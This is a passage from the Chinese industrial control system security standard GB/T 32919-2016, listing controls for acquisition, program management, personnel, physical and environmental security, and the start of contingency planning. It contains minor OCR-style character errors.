制定并发布正式的系统和服务获取策略,其中应包含目的、范围、角色、责任、管理承诺、组织各 部门之间的协调以及合规性; b) 制定并发布正式的系统和服务获取规程,以推动风险评估策略及与相关安全控制的实施; c) 应按【赋值:组织定义的时间间隔】,对系统和服务获取策略和规程进行评审和更新。 补充指导: a) 期望通过该控制来有效实现系统和服务获取族中安全控制和安全增强的策略和规程; b) 这些策略和规程要与相关法律、法规、政策以及相关的标准保持一致; c) 系统和服务获取策略可作为组织信息安全策略的一部分; d) 系统和服务获取规程一般可针对安全程序予以开发,当需要时也可针对特殊的 ICS 予 以 开发; e) 在开发系统和服务获取策略中,组织的风险管理战略是一个重要的因素。 控制增强:无 B.4.2 资源分配(SA-2) 控制: 组织应: a) 在组织使命和业务过程规划中,确定 ICS 的信息安全需求; b) 确定并分配保护ICS 所需要的资源,作为ICS 主规划一部分.作为投资控制过程的一部分; c) 在组织的活动程序和预算文档中,建立信息安全的相应条日。 补充指导: 相关安全控制:PM-3 、PM-11。 控制增强:无 B.4.3 生存周期支持(SA-3) 控制: 组织应: a) 采用系统生存周期管理方法来管理 ICS; b) 在整个系统生存周期中,定义ICS 安全角色和责任,并建立相应的文档; c) 标识具有 ICS 安全角色和责任的个体。 补充指导: 相关安全控制:AT-3 、PM-7 、SA-8。 控制增强:无 B.4.4 服务获取(SA-4) 控制: a) 在 ICS 获取合同中,组织应基于风险评估,按相关法律、法规、政策、标准和指南的要求,显式地 给出如下需求和规约:安全功能需求和规约、与安全有关的文档需求、与开发和演化有关的保 障需求。 补充指导: a) 应制定ICS 及其部件和服务的获取文档,包括描述以下内容的需求:安全需要、需要的设计和 开发过程、需要的测试和评估规程、需要的文档; b) 对于获取文档中的需求,当标识了新的威胁和脆弱性时,或当采用新的实现技术时,允许调整 GB/T 32919—2016 其中的安全控制; c) 获取文档还包括有关 ICS 文档方面的需求;这些文档强调用户和系统管理员的指南,以及有关 安全控制实现方面的信息;文档的详细程度将基于该ICS 的安全分类; d) 所需要的文档包括安全配置设置和安全实现指南; e) 相关安全控制:CM-6、PL-2、PS-7、SA-3、SA-5、SA-8。 控制增强: a) 组织应要求供应商或合同方在文档中提供描述该ICS 及其部件和服务所使用的安全控制的详 细功能特性信息,可对安全控制进行分析和测试; b) 组织应要求供应商或合同方在文档中提供描述该 ICS 及其部件和服务所使用的安全控制的 设计和实现的详细信息,可对安全控制进行分析和测试; c) 组织应限制获取市场上具有安全能力的信息技术产品,在使用前应进行评估和确认; 增强补充指导: 1) 健壮性需求,组织使命和业务过程,以及整个客户需要,能使有经验的 ICS 安全工程人员, 针对正提交评估的产品,提出使用什么样保障等级 (EAL) 的信息技术产品的建议。 d) 组织应要求软件供应商或制造方证实他们的软件开发过程使用了安全的工程方法、质量控制 过程和确认技术,使软件弱点和恶意最小化; e) 组织应确保所获取的每一个部件显式地分配给 ICS, 并且系统拥有者承认该分配; f) 组织应限制在市场上获取的现成信息技术产品,是那些已通过国家安全相关部门评估的产品, 具有信息保障和能使达到保障管治的现成信息技术; g) 为了保护公共发布的信息,免遭恶意的干扰或破坏,并确保它的可用性,组织应确保使用了市 场上具有基本的信息保障能力的信息技术产品; h) 当信息对那些未被授权访问ICS 中所有信息的个体访问的时候,为了保护受控的非机密信 息,组织应确保使用市场上基本信息保障能力的信息技术产品; i) 为了保护国家机密的安全信息,仅使用市场上高信息安全保障能力的信息技术产品,确保信息 技术产品已通过国家安全相关部门的评估和确认; j) 组织应要求获取文档中的 ICS 部件,以安全和规定的配置方式予以交付,并且该安全配置对任 何软件重新安装或调整均是默认的配置。 B.4.5 系统文档(SA-5) 控制: a) 组织应编制可用于授权人员和管理员的 ICS 文档。该文档应描述如下内容: 1) ICS 的安全配置、安装和运行; 2) 安全特征和功能的有效使用和维护; 3) 有关配置和行政管理功能用中已知的脆弱性; 4) 并按要求对这样的文档予以保护。 b) 组织应编制可用于授权用户的 ICS 文档。该文档应描述如下内容: 1) 用户可访问的安全特征和功能,以及如何有效使用这些安全特征和功能; 2) 用户与系统交互的方法,以便使个体能以安全的模式来使用系统; 3) 在维护信息安全和 ICS 安全中的用户责任; 4) 并按要求对这样的文档予以保护。 c) 当文档或是不可用时或不存在时,记录要编制的ICS 文档。 补充指导: 相关安全控制:CM-6、CM-8、PL-2、PL-4、PS-2、SA-3、SA-4。 控制增强: a) 需要时,获取并保护描述 ICS 中所使用的安全控制的功能特性的具有充分的详细的文档,允许 对其中功能特性进行分析和测试,从而使文档对授权人员、供应商、制造者是可用的; b) 需要时,获取并保护描述了ICS 与安全有关的外部接口的具有充分的详细程度的文档,允许 对其中外部接口进行分析和测试,从而使文档对授权人员、供应商、制造者是可用的; c) 需要时,获取并保护以子系统以及安全控制的实现细节来描述 ICS 高层设计的具有充分的详 细程度的文档,允许对其中的子系统和实现细节进行分析和测试,从而使文档对授权人员、供 应商、制造者是可用的; d) 需要时,获取并保护描述了ICS 与安全有关外部接口的具有充分的详细程度的文档,允许对 其中外部接口进行分析和测试,从而使文档对授权人员、供应商、制造者是可用的; e) 需要时,获取和保护 ICS 的源码,并对授权人员是可用的,允许进行分析和测试。 B.4.6 软件使用限制(SA-6) 控制: 组织应: a) 按照采购合同、协议等合法手段来使用软件及其相关文档; b) 对于由授权许可所保护的软件及相关文档,控制其拷贝和分布; c) 控制并记录文件共享技术的使用,确保共享技术未被用于未授权发布、执行或拷贝等。 补充指导: a) 依赖于组织的需要,跟踪系统可以涉及简单的复印或完全自动化的特定应用。 b) 相关安全控制:CM-6、CM-8、PL-2、PL-4、PS-2、SA-3、SA-4。 控制增强: a) 防止在 ICS 中使用来自开源、受限制的或无认证源代码源的可执行代码; b) 仅当没有可选的解决方案时,才允许使用那样的源代码,但要提出相应的期望,并得到授权责 任人的授权同意。 B.4.7 用户安装软件(SA-7) 控制: a) 组织应实施显式的规则,管制用户安装的软件。 补充指导: a) 如果提供了必要的特权,用户才可以安装软件; b) 组织应【赋值:标识允许安装什么类型的软件(例如对现有软件的调整和打补丁),阻止什么类 型软件的安装】; c) 相关安全控制:PM-7、SA-3、SA-4、SC-2、SC-3。 控制增强:无 B.4.8 安全工程原则(SA-8) 控制: a) 组织应将 ICS 安全工程原则应用于 ICS 的需求规约、设计、开发、实现和变更中。 补充指导: a) 应用安全工程原则主要是针对新开发的 ICS 或针对正在进行升级的系统,并把这样的工程原 则集成到该系统的开发生存周期中; b) 对于在运行系统,组织把安全工程原则应用于系统的调整和修改,使之能够灵活性地给出系 GB/T 32919—2016 统中硬件、软件和固件的当前状态; c) ICS 的安全工程原则,包括但不限于: 1) 开发层次化的保护; 2) 建立有效的安全策略、体系结构、控制,作为设计的基础; 3) 把安全编入到该系统的生存周期中; 4) 描绘物理和逻辑边界; 5) 确保开发人员和集成人员得到有关如何开发 ICS 安全软件的适当培训; 6) 剪裁安全控制,以便满足组织和运行需要,减少或缓解风险到可接受程度; d) 相关安全控制:PM-7、SA-3、SA-4、SA-17、SC-2、SC-3。 控制增强:无 B.4.9 外部系统服务(SA-9) 控制: 组织应: a) 要求 ICS 服务的外部提供者遵从组织的信息安全需求,并按相关法律、法规、方针、政策、规章、 制度、标准和指南的要求,使用合适的安全控制; b) 针对外部ICS 服务,定义用户角色、责任,并建立相应的文档; c) 监视外部服务提供者是否符合安全控制。 补充指导:无 相关安全控制:CA-3、IR-7、PS-7。 控制增强: a) 在获取指定的 ICS 安全服务前,进行组织层面上的风险评估; b) 确保获取的指定ICS 安全服务,得到【赋值:组织定义的高层领导批准】。 增强补充指导: 1) 指定的 ICS 安全服务,包括:不良事件监视、分析和响应,与信息安全相关设备的运行。 B.4.10 开发人员的配置管理(SA-10) 控制: 组织应要求 ICS 开发人员和集成人员: a) 在 ICS 设计、开发、实现和运行期间执行配置管理; b) 管理并控制对ICS 的变更; c) 仅实现那些得到组织批准的变更; d) 建立得到批准的 ICS 变更文档; e) 跟踪安全缺陷和缺陷解决方案。 补充指导: 相关安全控制:CM-3、CM-4、CM-9。 控制增强: a) 组织要求ICS 开发人员和集成人员提供软件的完整性检测,以便在软件交付后,支持组织进行 软件完整性验证; b) 在开发人员和集成人员指定的配置管理项缺少的情况下,组织为相关人员提供可选的配置管 理过程。 增强补充指导: 1) 配置管理过程涉及关键的组织人员,该人员负责评审并批准对 ICS 提出的变更建议,还涉及在实现任一变更之前进行影响分析的组织人员。 B.4.11 开发人员的安全测试(SA-11) 控制: 组织应要求 ICS 开发人员、集成人员与相关的安全人员商讨: a) 建立并实现安全测试和评估计划; b) 实现可验证缺陷修补的过程,纠正安全测试和评估期间发现的弱点和不足; c) 建立安全测试和评估的文档和缺陷修补过程文档。 补充指导: a) 开发的安全测试结果,在得到验证后,应最大灵活性地使用,并了解这些结果所受到的影响; b) 测试结果可用于支持交付的 ICS 的安全授权过程; c) 相关安全控制:CA 2、CM-4、SA-3、SA-4、SA-5、SI-2。 控制增强: a) 组织应要求 ICS 开发人员和集成人员使用代码分析工具检查软件中的公共缺陷,并建立分析 结果文档; b) 组织应要求1CS 开发人员和集成人员执行脆弱性分析,建立脆弱性、利用可能性以及风险缓 解文档; c) 组织应要求 ICS 开发人员和集成人员依据独立验证和确认代理的证据,创建并实现一个安全 测试和评估计划。 B.4.12 供应链保护(SA-12) 控制: a) 组织应使用【赋值:组织定义的防止供应链威胁的度量列表】.防止供应链威胁,作为 ICS 综合 防御安全战略的一部分。 补充指导: a) 防御途径有功于ICS 整个生命周期内的保护,即设计、开发、安装、系统集成、运行、维护和退役 期间的保护; b) 这样的保护是通过标识、管理、消除生存周期每一阶段上的脆弱性,并使用互补的缓解风险的 支持战略而实现的; c) 相关安全控制:AT-3 、CM-8、IR-4、PE-16、PL-8 、SA-3 、SA-4 、SA-8 、SA-10 、SA-14 、SA-15。 控制增强: a) 组织应使用匿名的获取过程; b) 组织应购置初始获取中所有ICS 部件以及相关附件; 增强补充指导: 1) 购买 ICS 所有系统和组件,可避免在未来几年中使用不大可信赖的次级产品或重新在市 场上购买产品。 c) 对要获取的硬件、软件、固件或服务,在编入合同协议前,组织应对供应方进行认真的评审; 增强补充指导: 1) 组织评审供应者链,看他们在 ICS 部件或产品的开发和制造中是否使用合适的安全过程。 d) 有关 ICS 、ICS 部件以及信息技术产品,组织应使用可信的运输途径; c) 组织应使用多种多样的ICS 、ICS 部件、信息技术产品和ICS 服务的供应方; f) 组织应使用标准配置的 ICS 、ICS部件、信息技术产品; g) 组织应使ICS 、ICS 部件、信息技术产品的购置决策和交付之间的时间最短; GB/T 32919—2016 h) 组织对交付的 ICS、ICS构件、信息技术产品进行独立分析和渗透测试。 B.4.13 可信赖性(SA-13) 控制: a) 组织应要求ICS 满足【赋值:组织定义的可信等级】。 补充指导: a) 该控制的目的是确保组织了解可信赖性的重要,并在 ICS 设计、开发和实现时,做出显式的可 信赖性决策; b) 可信赖性是 ICS 的一个特性,表达了系统防护信息在被系统处理、存储和传输中保密性、完整 性和可用性所期望的程度; c) 相关安全控制:RA-2、SA-4、SA-8、SA-14、SC-3。 控制增强:无 B.4.14 关键系统部件(SA-14) 控制: 组织应: a) 确定【赋值:需要重新实现的关键工业控制系统部件列表】; b) 重新实现或定制开发这样的 ICS 部件。 补充指导: a) 基本假定是,由于来自供应链的威胁,【赋值:组织定义的信息技术产品】不是可信的; b) 组织应重新实现或定制开发这样的 ICS 部件,以满足高保障需求。 控制增强: a) 标识还没有见到可选源的ICS 部件; b) 使用【赋值:组织定义的保障策略】,确保 ICS 部件的关键安全控制没有受到破坏。 增强补充指导: 1) 组织考虑实施的措施,包括:增强审计、限制源代码和系统功能的访问等。 B.5 程序管理(PM) B.5.1 程序管理计划(PM-1) 控制: a) 组织应开发并宣贯一套组织层面的 ICS 信息安全程序管理计划,包括: 1) 提供安全程序要求概述,以及满足这些要求的安全程序管理控制的说明; 2) 提供有关程序管理控制的充分信息,以便能够实现该计划的意图,并确定该计划是否能够 按计划实施; 3) 应包括角色、责任、管理承诺、组织机构之间的协调和合规性; 4) 获得组织内【赋值:相关责任人】的批准; b) 应按【赋值:组织定义的时间间隔】,修订完善该信息安全程序管理计划; c) 应修改计划来满足组织变更的需求,或满足计划实施和安全评估过程中发现问题的需求。 补充指导: a) 信息安全程序管理计划可作为独立文件,或大型文件的一部分; b) 信息安全程序管理计划控制是组织范围内的通用控制; c) 程序管理策略可作为组织信息安全策略的一部分。 控制增强:无 B.5.2 信息安全高管(PM-2) 控制: 组织应任命高级信息安全官,负责资源协调、开发、实现和维护组织范围的 ICS 信息安全。 补充指导:无 控制增强:无 B.5.3 信息安全资源(PM-3) 控制: 组织应: a) 确保实现信息安全程序和文档所有例外要求所需的资源; b) 雇佣一个能够实现 ICS 信息安全需求所需资源的合作伙伴; c) 确保信息安全资源可按照计划提供。 补充指导: a) 组织可指定并授权投资审查委员会来管理和监督的信息安全相关资本规划和投资支出过程。 控制增强:无 B.5.4 行动和里程碑计划(PM-4) 控制: 组织应实现一个确保ICS 信息安全行动计划,以减轻风险发生时对组织使命、业务运行和资产造 成的影响。 补充指导; a) 该计划是信息安全程序的重要关键文档; b) 该计划的更新是基于安全控制的结果评估、安全影响分析,是持续的监控活动; c) 相关的控制:CA-5。 控制增强:无 B.5.5 安全资产清单(PM-5) 控制: a) 组织应开发并维护一套 ICS 的安全资产清单。 补充指导: a) 该控制应满足相关标准对资产清单的要求。 控制增强:无 B.5.6 安全性能度量(PM-6) 控制: a) 组织应开发、监控并报告 ICS 信息安全性能度量结果。 补充指导: a) 安全性能度量是组织ICS 信息安全程序和安全控制设施效果的基础指标。 控制增强:无 B.5.7 组织架构(PM-7) 控制: a) 设计组织架构时应充分考虑ICS 信息安全风险对组织使命、业务运行、资产、个人、国家等的 影响。 补充指导: a) 组织架构设计应考虑国家对组织架构的相关要求; b) 将安全需求和安全控制整合到组织架构中,有助于确保早期ICS 生命周期中的安全考虑得以 满足,并符合组织业务流程需要; c) 完整的安全体系与组织风险管理应和安全策略相一致; d) 通过实施风险管理、安全标准和指南,能有效地实现了安全要求和安全控制的集成; e) 相关控制:PM-11 、RA-2。 控制增强:无 B.5.8 关键基础设施计划(PM-8) 控制: a) 组织应开发、发布并按【赋值:组织定义的时间间隔】更新一套满足相关要求的关键基础设施和 关键资源保护计划。 补充指导: a) 定义关键基础设施和关键资源保护计划应满足相关法律、法规、规章、制定、标准和指南的 要求; b) 相关控制:PM-1 、PM-9 、PM-11 、RA-3。 控制增强:无 B.5.9 风险管理策略(PM-9) 控制: 组织应: a) 开发一套全面的风险管理策略来保护组织业务和资产; b) 风险管理策略应与组织战略相一致。 补充指导: a) 组织层面的风险管理策略应包括:明确表达组织风险承受能力、可接受的风险评估方法、风险 缓解策略、随着时间的推移持续的评估和监控风险的方法; b) 风险执行功能可促进组织范围内风险管理策略的一致性; c) 组织范围内的风险管理策略应是广泛和全面的; d) 相关控制:RA-3。 控制增强:无 B.5.10 安全授权过程(PM-10) 控制: 组织应: a) 通过安全授权过程管理组织信息安全状态; b) 指定专人负责风险管理过程中安全授权的角色和职责; c) 将安全授权过程集成到组织范围内的风险管理流程中。 补充指导: a) 安全授权过程是实施风险管理和满足相关标准规范的必要组成部分; b) 为每个 ICS 指定安全授权负责人。 c) 相关控制:CA-6。 控制增强:无 B.5.11 业务流程定义(PM-11) 控制: 组织应: a) 在考虑信息安全及安全风险对组织运营、组织资产、个人、其他组织和国家等影响的基础上定 义业务流程; b) 根据信息安全需要定义业务流程和修改业务流程,直到满足信息安全保护需要。 补充指导: a) 信息安全保护需求是技术无关的,应对抗来自组织、个人或国家等层面对机密性、完整性和可 用性的威胁; b) 信息安全保护需求来自于组织业务需求,选择符合【赋值:组织定义的业务流程和风险管理策 略】; c) 信息安全保护需求确定组织所需的安全控制和支撑业务流程的ICS; d) 固有的组织信息安全保护需求定义存在明显不足,可能无法有效保护 ICS 信息安全 e) 业务流程定义和关联信息安全保护需求应按组织政策和程序进行归档; f) 相关控制:PM-7 、PM-8 、RA-2。 控制增强:无 B.6 人员安全(PS) B.6.1 人员安全策略和规程(PS-1) 控制: 组织应: a) 制定并发布正式的人员安全策略,内容至少应包含:目的、范围、角色、贵任、管理承诺、相关部 门间的协调以及合规性; b) 制定并发布正式的人员安全规程,以推动人员安全策略和相关人员安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对人员安全策略和规程进行评审和更新。 补充指导: a) 该控制有效实现该族中的安全控制和控制增强,编制所需要的策略和规程。 b) 该策略和规程应与国家相关法律、法规、政策、标准和指南保持一致。 c) 人员安全策略可作为组织信息安全策略的一部分。 d) 人员安全规程可针对一般性的安全程序予以开发;需要时,可针对特殊ICS 予以开发。 e) 在开发人员安全策略时,组织风险管理策略是重要因素。 控制增强:无 B.6.2 岗位分类(PS-2) 控 制 组织应: a) 建立 ICS 岗位分类机制; b) 评估 ICS 所有岗位的风险; c) 建立人员审查制度,尤其对控制和管理ICS 关键岗位的人员进行审查; GB/T 32919—2016 d) 按【赋值:组织定义的时间间隔】对岗位风险进行评审和更新。 补充指导: a) 岗位风险命名与实施的人员管理策略和指导是一致的; b) 筛选准则涉及显式的信息安全角色委派需求(例如:培训,安全清理); c) 相关安全控制:AT-3、PL-2、PS-3。 控制增强:无 B.6.3 人员审查(PS-3) 控制: 组织应: a) 在授权访问ICS 及相关信息前进行人员审查; b) 在人员离职或岗位调整时对其进行审查。 补充指导: a) 人员审查应符合国家相关法律、法规、政策、标准和指南 b) 组织可基于ICS 的安全定级,为访问ICS 的人员【赋值:定义不同的审查条件和审查频率】; c) 相关安全控制:AC-2、IA-4、PE-2、PS-5、PS-6。 控制增强: a) 组织应确保每个访问涉及国家秘密信息处理、存储或传输ICS 的用户,按该ICS 最高信息秘密 等级进行人员审查,并对访问人员进行了相应的保密教育; b) 组织确保每个访问涉及敏感信息处理、存储或传输 ICS 的用户,按该系统敏感信息的最高秘 密等级进行人员审查,并对访问人员进行了相应的保密教育。 B.6.4 人员离职(PS-4) 控制; 组织应: a) 终止离职人员对 ICS 的访问权限; b) 删除与离职人员相关的任何身份鉴别信息; c) 与离职人员签订安全保密协议; d) 收同离职人员所有与安全相关系统的所有权; e) 确保离职人员移交与ICS 相关资产和工具。 补充指导: a) 与ICS 相关资产和工具,包括:系统管理技术手册,密钥,身份标识卡; b) 离职谈话,确保个体理解由前任雇佣人员所强加的任意安全约束,并对所有与ICS 有关的特 性,实现合理的可核查性; c) 在一些情况中,例如:在任务遗弃的情况,某些有病情况,以及没有可用的监管人员情况,对人 员的离职谈话有可能是不能进行的; d) 离职谈话对个体的安全清理是重要的,特别对由于某种原因所终止的雇员或合同方,该控制 的及时执行是基本的控制; e) 相关安全控制:AC-2、IA-4、PE-2、PS-5、PS-6。 控制增强:无 B.6.5 人员调离(PS-5) 控制: GB/T 32919—2016 a) 当人员调离到组织内其他工作岗位时,组织应【赋值:在规定的时间】内,评审其对ICS 的逻辑 和物理访问,并根据评审结果调整其访问权限。 补充指导: 人员调离到组织内其他工作岗位,无论是永久还是临时的,均应: a) 收回老的,并换发新的钥匙、通行证等相关证件; b) 关闭 ICS 原账户,并根据新职位的需要开新账号; c) 改变 ICS 的访问权限; d) 提供个人以前的工作地点和 ICS 账户访问官方记录; e) 相关安全控制:AC-2、IA-4、PE-2、PE-2、PS-4。 控制增强:无 B.6.6 访问协议(PS-6) 控制: 组织应: a) 制定 ICS 的访问协议并形成文件; b) 按【赋值:组织定义的时间间隔】评审并更新访问协议; c) 确保在授权人员访问ICS 前与其签订访问协议,并在访问协议更新或到期后重新签订。 补充指导: a) 访问协议,包括:保密协议、可接受的使用协议、行为规则等相关协议 b) 所签订的访问协议包括承诺,即个人已阅读、理解对ICS 有关的授权访问约束,并同意遵循 c) 在承诺的访问协议中,可使用电子签名,除非组织策略明文规定不能使用 d) 相关安全控制: PL-4、PS-2、PS·3、PS-4、PS-8。 控制增强: a) 组织应确保特殊保护措施 ICS 的访问,仅授权给: 1) 具有有效访问授权的人; 2) 满足相关人员安全准则的人。 b) 组织应确保特殊保护措施的秘密信息的访问,仅授权给: 1) 具有有效访问授权的人; 2) 满足相关的、符合可用的法律的人员安全准则的人 3) 已阅读、理解已签署保密协议的人。 B.6.7 第三方人员安全(PS-7) 控制: 组织应: a) 为第三方供应商建立包含安全角色和责任的人员安全要求,并形成文件; b) 要求第二方供应商遵守已制定的人员安全策略和规程; c) 第二方供应商在人员调动或离职时予以告知; d) 监视第三方供应商的合规性。 补充指导: a) 第三方供应商包括:服务单位,合同方以及提供 ICS 开发、ICS 技术服务、外源应用以及网络 安全管理等; b) 在与获取有关的文档中,组织一般会明确人员安全需求; c) 相关安全控制:PS-2、PS-3、PS-4、PS-5、PS-6、SA-9。 控制增强:无 B.6.8 人员处罚(PS-8) 控制: a) 组织应对违反安全策略和规程的人员建立违规处罚制度。 补充指导; a) 该制度应与相关法律、法规、制度相一致; b) 该制度应在访问协议中描述,并可包含在一般性的人员策略和规程中; c) 相关安全控制:PL-4 、PS-6。 控制增强:无 B.7 物理与环境安全(PE) B.7.1 物理与环境安全策略和规程(PE-1) 控制: 组织应: a) 制定并发布正式的物理和环境安全策略,内容至少应包含:目的、范围、角色、责任、管理承诺、 相关部门间的协调和合规性; b) 制定并发布正式的物理和环境安全章程,以推动物理和环境保护策略和相关安全控制的 实施; c) 按【赋值:组织定义的时间间隔】,对物理和环境保护策略及规程进行评审和更新。 补充指导; a) 物理和环境保护策略和章程应与适用的法律、法规、政策及标准等相一致。物理和环境保护策 略可以包含在组织的通用信息安全策略中,需要时,可针对特殊ICS 予以开发。 控制增强:无 B.7.2 物理访问授权(PE-2) 控制: 组织应; a) 制定并维护对ICS 具有访问权限的人员名单; b) 按【赋值:组织定义的时间间隔】对授权人员进行评审和批准; c) 根据职位、角色对ICS 实施进行物理访问授权。 补充指导: a) 授权证书包括标记卡和智能卡等; b) 组织应及时从访问列表中清除那些不再访问ICS 的人员。 控制增强:无 B.7.3 物理访问控制(PE-3) 控制: 组织应: a) 加强对 ICS 实施所在出入口的物理访问控制; b) 在指定出入口采用围墙、门禁、门卫等物理访问控制措施,具有物理访问授权不代表对该区域 ICS 组件有逻辑访问权; c) 在访问ICS 设施前对人员的访问权限进行验证; d) 维护物理访问记录; e) 制定公共访问区访问控制策略; f) 在需要对访客进行陪同和监视的环境下对访问者的行为进行陪同和监视。 补充指导: a) 组织应使用物理访问设备(如,密码锁、读卡机)或配备门卫等方式控制人员访问ICS 设施; b) 组织应使用规则保护密码锁和其他访问控制设施 c) 组织应按【赋值:组织定义的时间间隔】更换访问控制设备的口令,在密码泄露和人员调动或离 职时更换访问控制设备的口令; d) 置于公共区域内的 ICS 外围设备应控制该区域的访问; e) 相关安全控制:PE-2 、PE-4 、PS-3。 控制增强: a) 组织应控制对ICS 的物理访问,这些控制应独立于对设施的物理访问控制 b) 应对较容易进入H 拥有可移动介质驱动器的计算机采取带锁、卸载或禁用等手段提高安 全性; c) 应将服务器放置在带锁的区域并采用认证保护机制; d) 应将 ICS 网络设备放置在只能由授权人员访问的符合环境要求的安全区域中。 B.7.4 传输介质的访问控制(PE-4) 控制: a) 组织应采用安全防护措施对ICS 设施内的传输线路进行物理访问控制。 补充指导: a) 对 ICS 实施传输线路的保护有助于防止对意外损坏、中断和物理篡改; b) 物理安全措施有助于防止未加密的传输信息的窃听和篡改; c) 相关安全控制:MP-2 、MP-4 、PE-2 、PE-3。 控制增强:无 B.7.5 输出设备的访问控制(PE-5) 控制: a) 组织应控制对ICS 输出设备的物理访问,防止未授权人员获取输出信息。 补充指导: a) ICS 输出设备,包括:监视器、打印机以及其他视听设备等; b) 输出设备的访问控制包括,放置在锁定的房间内、放置在安全领域,对输出设备进行授权访 问,监控人员使用; c) 相关安全控制: PE-2 、PE-3 、PE-4。 控制增强: a) 控制对输出设备的物理访问; b) 确保只有授权人员收到来自设备的输出; e) 组织应对输出设备进行标记,标明哪些信息可以标记的输出设备输出。 B.7.6 物理访问监控(PE-6) 控制: a) 组织应监控对 ICS 的物理访问,以监测并响应物理安全事件。 GB/T 32919—2016 补充指导: a) 组织应按【赋值:组织定义的时间间隔】审查物理访问日志,调查明显的安全侵害或可疑的物理 访问行为; b) 组织应对检测出的物理安全事件做出响应; c) 相关安全控制:CA-7、IR-4。 控制增强: a) 组织应设置防盗报警系统,识别潜在入侵、实时入侵报警并发起适当的响应行为; b) 组织应采用自动化设备识别入侵,并实施自动响应动作; c) 组织应采用视频监控,并保留视频记录。 B.7.7 访问日志(PE-7) 控制: a) 组织应保存 ICS 访问日志; b) 组织应指派人员按【赋值:组织定义的时间间隔】期审查访问日志。 补充指导: a) 访问日志应包括:来访人员的名字、所属组织、访客签名、访问目的、鉴别形式、访问的ICS 及部 件、进入和离开的时间、陪同监视人名字; b) 公共区域的访问不记录在 ICS 访问日志内。 控制增强: a) 组织使用自动化的机制促进访问H 志的维护和同顾; b) 组织维护所有物理访问的记录,包括访客和授权用户。 B.7.8 电力设备与电缆(PE-8) 控制: a) 组织应保护ICS 的电力设备和电缆,免遭破坏和损坏; b) 组织应依据安全需求和风险,采用禁用或对电源进行物理保护的手段来防止系统的非授权的 使用。 补充指导:无 a) 组织应确定在不同地点的电力设备和电缆的保护需求。 b) 相关安全控制:PE-4. 控制增强: a) 组织使用冗余的电力设备和电缆; b) 组织应对【赋值:组织定义的关键工业控制系统部件列表】,使用自动化灾难备份等安全控制 措施。 B.7.9 紧急停机(PE-9) 控制: 组织应: a) 确保在紧急情况下能够切断ICS 电源或个别组件电源; b) 在【赋值:组织定义的工业控制系统或系统部件位置】设置安全易用的紧急断电开关或设备; c) 保护紧急断电能力以防止非授权操作。 补充指导:无 控制增强:无 B.7.10 应急电源(PE-10) 控制: 组织应: a) 为 ICS 配备应急 UPS 电源,并计算其续航时间; b) 提供短期不间断电源,以便在主电源失效的情况下正常关闭ICS; c) 提供长期备份电源,以便主电源失效时在规定时间内保持 ICS 功能。 补充指导: a) 相关安全控制:AT-3 、CP-2。 控制增强: a) 组织应为ICS 提供备用电力供应系统,ICS 能够在主电源长期丧失的事故中有能力维持 ICS 所必须的最小的运行能力。 b) 组织应提供 ICS 长期的备用电力供应系统,该系统是独立运行而不依赖外部电源的。 B.7.11 应急照明(PE-11) 控制: 组织应: a) 为 ICS 部署应急照明并进行维护,并确保其在断电情况下的可用性; b) 在急照明设施中包含紧急通道和疏散通道指示牌。 补充指导:无 a) 相关安全控制:CP-2 、CP-7。 控制增强:无 B.7.12 消防(PE-12) 控制: 组织应: a) 为 ICS 部署火灾检测和消防系统或设备,并维护该设备; b) 为消防系统或设备配备独立电源。 补充指导: a) 防火灭火设备或系统包括但不限于洒水系统、手动灭火器、固定灭火水龙带和冒烟检测设备。 控制增强: a) 使用防火设备或系统,该设备或系统在火灾事故中会自动激活并通知组织和紧急事件处理 人员; b) 使用灭火设备或系统,该设备或系统为组织和紧急事件处理人员提供任何激活操作的白动 通知; c) 使用自动灭火系统; d) ICS 组件集中部署的区域,如主机房、通信设备机房等应采用具有耐火等级的建筑材料,采取 区域隔离防火措施,将重要设备与其他设备隔离。 B.7.13 温湿度控制(PE-13) 控制: 组织应: a) 维护 ICS 所在设施的温湿度,使其处于可接受的范围; b) 按【赋值:组织定义的时间间隔】监视温湿度。 补充指导:无 控制增强: a) ICS 组件集中部署的区域,如主机房、通信设备机房等应设置温湿度自动调节设施,使机房温 湿度的变化在设备运行所允许的范围之内。 B.7.14 防水(PE-14) 控制: a) 组织应提供易用、工作正常的、关键人员知晓的总阀门或隔离阀门以保护ICS 免受漏水事故的 损害。 b) ICS 组件集中部署的区域,如主机房、通信设备机房等水管安装不得穿过机房屋顶和活动地板 下,防止雨水通过机房窗户、屋顶和墙壁渗透。 补充指导:无 控制增强: a) 组织应使用自动化机制,在重大漏水事故时能保护ICS 免受水灾。 B.7.15 交付和移除(PE-15) 控制: a) 组织应对【赋值:组织定义的工业控制系统部件类型】进行授权、监视、控制,并维护相关记录。 补充指导: a) 组织应控制交付和移除区域,如果可能,设置独立区域,以防止未授权访问。 b) 相关安全控制:CM-3 、MA-2。 控制增强:无 B.7.16 备用工作场所(PE-16) 控制: 组织应: a) 在备用工作场所,使用【赋值:组织定义的管理、运行和技术上的工业控制系统安全控制】; b) 评估备用工作场所安全控制措施的可行性和有效性; c) 提供安全事件发生时与信息安全人员沟通的渠道。 补充指导:无 控制增强:无 B.7.17 防雷(PE-17) 控制: a) 组织应在放置 ICS 的设施内设置避雷装置,系统和组件集中部署区域,如主机房、通信设备机 房等应满足机房相关安全标准。 补充指导:无 控制增强:无 B.7.18 电磁防护(PE-18) 控制: a) ICS 应满足电磁防护要求,防止外界电磁干扰和设备寄生耦合干扰;电源线和通信线缆应隔离,避免互相干扰。 补充指导:无 控制增强:无 B.7.19 信息泄露(PE-19) 控制: a) 组织应保护 ICS 使其免遭电磁信号辐射造成的信息泄露。 补充指导:无 控制增强:无 B.7.20 人员和设备追踪(PE-20) 控制: a) 组织应采用资产定位技术来追踪并监视控制区域内的人员活动和设备位置,以确保它们处于 被允许的区域,识别需要辅助的人员,并支持应急响应。 补充指导:无 控制增强: a) 当有违授权的访问或紧急事件发生时,电子监控机制告警。 B.8 应急计划(CP) B.8.1 应急计划策略和规程(CP-1) 控制: 组织应: a) 制定并发布正式的应急计划策略,内容包括目的、范围、角色、责任、管理承诺、组织实体之间的 协调关系以及依从关系等; b) 制定并发布正式的应急计划章程,以推进应急计划策略及相关安全控制的实施; c) 按【赋值:组织定义的时间间隔】,对应急计划策略及规程进行评审和更新。 补充指导: a) 应急计划策略和章程应与相关的法律、法规、政策、制度及标准相一致。 b) 应急计划策略可以包含在组织的通用信息安全策略中,需要时,可以为一般的安全程序或特 殊 ICS 制定应急计划章程。 控制增强:无 B.8.2 应急计划(CP-2) 控制: 组织应: a) 制定ICS 